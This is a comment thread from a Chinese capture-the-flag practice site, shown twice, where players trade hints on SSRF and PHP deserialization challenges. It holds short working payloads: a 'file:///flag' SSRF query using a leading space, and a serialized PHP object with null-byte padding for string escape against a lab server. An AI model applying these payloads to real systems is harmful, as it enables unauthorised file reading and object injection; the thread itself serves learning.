?name=%20file:///flag
"User-Agent" 那一栏提示curl,终端中使用curl空格然后加协议。可能后台代码判断开头空格识别是否为协议
www,太难了,看着wp我都做了好久,序列化和字符串逃逸,ssrf。。。
PHP字符逃逸和SSRF,我不会看WP做的...记到小本本里待学!
username=\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0&password=1";O:4:"evil":2:{s:4:"hint";s:8:"hint.php";} 为什么不行啊,页面没变化
http://114.67.246.176:11474/ username=\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0&password=1";O:4:"evil":2:{s:4:"hint";s:8:"hint.php&quo
空格逃逸闭合哈哈
这cgi是什么鬼啊
https://blog.csdn.net/qq_25755011/article/details/115950424
这个CGI属实给我整懵了,等待大佬给WriteUp。
...
评论
15338641414 2年前
举报
?name=%20file:///flag
zhougaoleng 2年前
举报
"User-Agent" 那一栏提示curl,终端中使用curl空格然后加协议。可能后台代码判断开头空格识别是否为协议
lengf 3年前
举报
www,太难了,看着wp我都做了好久,序列化和字符串逃逸,ssrf。。。
a2cai 3年前
举报
PHP字符逃逸和SSRF,我不会看WP做的...记到小本本里待学!
hhtctf2 3年前
举报
username=\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0&password=1";O:4:"evil":2:{s:4:"hint";s:8:"hint.php";} 为什么不行啊,页面没变化
hhtctf2 3年前
举报
http://114.67.246.176:11474/ username=\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0&password=1";O:4:"evil":2:{s:4:"hint";s:8:"hint.php&quo
4thrun 3年前
举报
空格逃逸闭合哈哈
BSOD 3年前
举报
这cgi是什么鬼啊
Endless 3年前
举报
https://blog.csdn.net/qq_25755011/article/details/115950424
鬼画符 3年前
举报
这个CGI属实给我整懵了,等待大佬给WriteUp。